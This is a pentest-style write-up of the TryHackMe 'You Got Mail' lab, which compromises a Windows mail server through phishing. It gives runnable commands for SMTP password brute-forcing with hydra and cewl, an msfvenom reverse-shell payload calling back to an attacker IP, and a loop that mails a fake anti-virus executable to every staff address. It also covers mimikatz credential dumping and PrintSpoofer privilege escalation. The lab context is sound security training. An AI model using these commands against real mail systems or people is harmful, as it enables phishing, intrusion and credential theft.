You Got Mail | Try Hack Me | Pentest Style Report on a CTF

You Got Mail | Try Hack Me | Pentest Style Report on a CTF

Room: tryhackme.com/room/yougotmail

Objective:

To perform a security assessment for Brik and test the susceptibility of employees to phishing attacks.

Scope:

Active assessments on <Machine_IP> 10.10.157.197
Passive reconnaissance on:
brownbrick.co

Reconnaisance:

We start with Nmap scan. (For CTFs I always like to do all port scan first and then do a service version and scripts scan on the open ports.
nmap -p- 10.10.157.197 -vvv
There are a lot of ports open

Now we enumerate the open ports with sVC for service version enumeration and default nmap scripts.

nmap -p 25,110,135,139,143,445,587,3389,5985,47001,49664,49665,49666,49667,49668,49669,49671,49672 -sVC 10.10.157.197

nmap -p 25,110,135,139,143,445,587,3389,5985,47001,49664,49665,49666,49667,49668,49669,49671,49672 -sVC 10.10.157.197
Starting Nmap 7.93 ( https://nmap.org ) at 2025-02-11 05:38 UTC
Nmap scan report for ip-10-10-157-197.eu-west-1.compute.internal (10.10.157.197)
Host is up (0.00043s latency).
PORT STATE SERVICE VERSION
25/tcp open smtp hMailServer smtpd
| smtp-commands: BRICK-MAIL, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
110/tcp open pop3 hMailServer pop3d
|_pop3-capabilities: USER TOP UIDL
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
143/tcp open imap hMailServer imapd
|_imap-capabilities: CHILDREN RIGHTS=texkA0001 NAMESPACE IMAP4rev1 SORT completed CAPABILITY QUOTA OK IDLE IMAP4 ACL
445/tcp open microsoft-ds?
587/tcp open smtp hMailServer smtpd
| smtp-commands: BRICK-MAIL, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2025-02-11T05:39:48+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=BRICK-MAIL
| Not valid before: 2025-02-10T05:10:02
|_Not valid after: 2025-08-12T05:10:02
| rdp-ntlm-info:
| Target_Name: BRICK-MAIL
| NetBIOS_Domain_Name: BRICK-MAIL
| NetBIOS_Computer_Name: BRICK-MAIL
| DNS_Domain_Name: BRICK-MAIL
| DNS_Computer_Name: BRICK-MAIL
| Product_Version: 10.0.17763
|_ System_Time: 2025-02-11T05:39:43+00:00
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
49672/tcp closed unknown
MAC Address: 02:19:9D:B1:01:83 (Unknown)
Service Info: Host: BRICK-MAIL; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_nbstat: NetBIOS name: BRICK-MAIL, NetBIOS user: <unknown>, NetBIOS MAC: 02199db10183 (unknown)
| smb2-time:
| date: 2025-02-11T05:39:43
|_ start_date: N/A
| smb2-security-mode:
| 311:
|_ Message signing enabled but not required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 60.53 seconds

The target system is running Windows & has multiple email-related ports open, including SMTP (25, 587), POP3 (110), and IMAP (143), indicating the presence of an hMailServer email service.

BrownBrick:

Now lets enumerate the brownbrick.co website to see what we can find.
There is nothing much on the website, but "Our Team" page gives info of potential users & their mail IDs.
brownbrick.co/menu.html

We make a list of the given email IDs:

oaurelius@brownbrick.co
tchikondi@brownbrick.co
wrohit@brownbrick.co
pcathrine@brownbrick.co
lhedvig@brownbrick.co
fstamatis@brownbrick.co


We have seen that SMTP has an hMailServer and we now have email IDs that potentially use that service. So lets try to brute force the password for all or any of the above mail IDs.

hydra -L emails.txt -P /usr/share/wordlists/rockyou.txt 10.10.157.197 smtp

There is potentially another easier way we can brute force by generating a wordlist from brownbricks.co using cewl

cewl https://brownbrick.co > pass.txt


I also like to generate a lowercase file just in case, and then combine both lists for brute force

cewl --lowercase https://brownbrick.co > pass_lower.txt


And then combining both

cat pass.txt pass_lower.tcxt > passwords.txt

Now use hydra

hydra -L emails.txt -P passwords.txt 10.10.157.197 smtp

We have a password for one email ID. (rockyou.txt could've also given us this password but it would've taken alot of time.)

Phishing:

As we have an email ID with its password for hMailServer, we can use thunderbird to login and send malicious mails to other users, or we can simply do that using a bash script. But first we need a payload that can give us reverse shell if any user clicks/installs it.
There are various ways to do this, like using a malicious VBA script in a .doc or .xls file or directly generating a reverse shell payload using msfvenom. I would like to try .xls file here for this task just to simulate a realistic phishing attack.
First generate a reverse shell VBA script via msfvenom

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.50.89.229 LPORT=443 -f vba


Copy the generated script into the macro of a new "sales_report.xls" file.
(Again, you don't need a meterpreter shell, you can use any windows reverse shell, you will use netcat to listen to in that case.)
If you went with meterpreter shell then start msfconsole and run multi/handler after setting the payload, LHOST and LPORT. If you used non-meterpreter payload then simple start a netcat listener.

Now to send the mails, we can use bash script:

for email in $(cat emails.txt); do sendemail -f "lhedvig@brownbrick.co" -t $email -u "Sales Report" -m "Please check the report is correct or needs to be updated." -a sales_report.xls -s 10.10.157.197:25 -xu "lhedvig@brownbrick.co" -xp "bricks"; done


Explanation:

for email in $(cat emails.txt); do ... done

Reads each email address from emails.txt and assigns it to the variable $email. Iterates over each email and executes the sendemail command for it.

sendmail

A command-line tool used to send emails via SMTP.

-f "lhedvig@brownbrick.co"

The sender's email address

-t $email

The recipient's email address (To field). This changes for each loop iteration.

-u "Sales Report"

Subject of mail

-m "Please check the report is correct or needs to be updated."

Message inside mail

-a sales_report.xls

Our malicious attachment

-s 10.10.157.197:25

SMTP server

-xu "lhedvig@brownbrick.co" -xp "bricks";

User ID and User Password

But I didn't get a shell, so it means VBA macro payload won't be executed as macros need to be activated, so we have to try a simpler direct payload.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.89.229 LPORT=443 -f exe -o update.exe

for email in $(cat emails.txt); do sendemail -f "lhedvig@brownbrick.co" -t $email -u "Sales Report" -m "Install the latest version of anti-virus to protect your system" -a update.exe -s 10.10.157.197:25 -xu "lhedvig@brownbrick.co" -xp "bricks"; done


And we get a reverse shell as
wrohit

Now get the user flag by navigating to the desktop

Lets enumerate some things:

So wrohit user is in administrators group, so we don't need to do a priv-esc (we will still do it at the end).
Now to answer the second question, we can use Mimikatz get the password.
We already have meterpreter shell so we can just load the kiwi extension of mimikatz. If we had a shell via netcat then we can simply upload mimikatz to the target and get the hash or even clear text password.

But this needed system privileges so kiwi didn't give any results, so I uploaded mimikatz to the target.

sekurlsa::wdigest

We get wrohit's password.
Now to answer the final question we have to navigate to
C:\Program Files (x86)\hMailServer\Bin\hMailServer.ini
As this is the file where hMailServer stores the credentials

(the official hMailServer website also shares this info but for some reason the website wasn't loading so I had to go to chatgpt)
By opening the hMailServer.INI file, type hMailServer.INI and we get the password hash.

To crack the password we can simply use crackstation (as this is a CTF and not a real target)

We get the password and the room is complete!



Priv-esc:

Although not required for this room, I still try to escalate our privileges.
By checking "whoami /priv" we see we have "SeImpersonatePrivilege"

We can use PrintSpoofer

GitHub - itm4n/PrintSpoofer: Abusing impersonation privileges through the "Printer Bug"

to priv-esc to Administrator. We just have to upload it to the target and run

And we have the highest privileges of a Windows system "nt authority\system".
Thank you for reading :)


My linkedin:
https://www.linkedin.com/in/imshadab18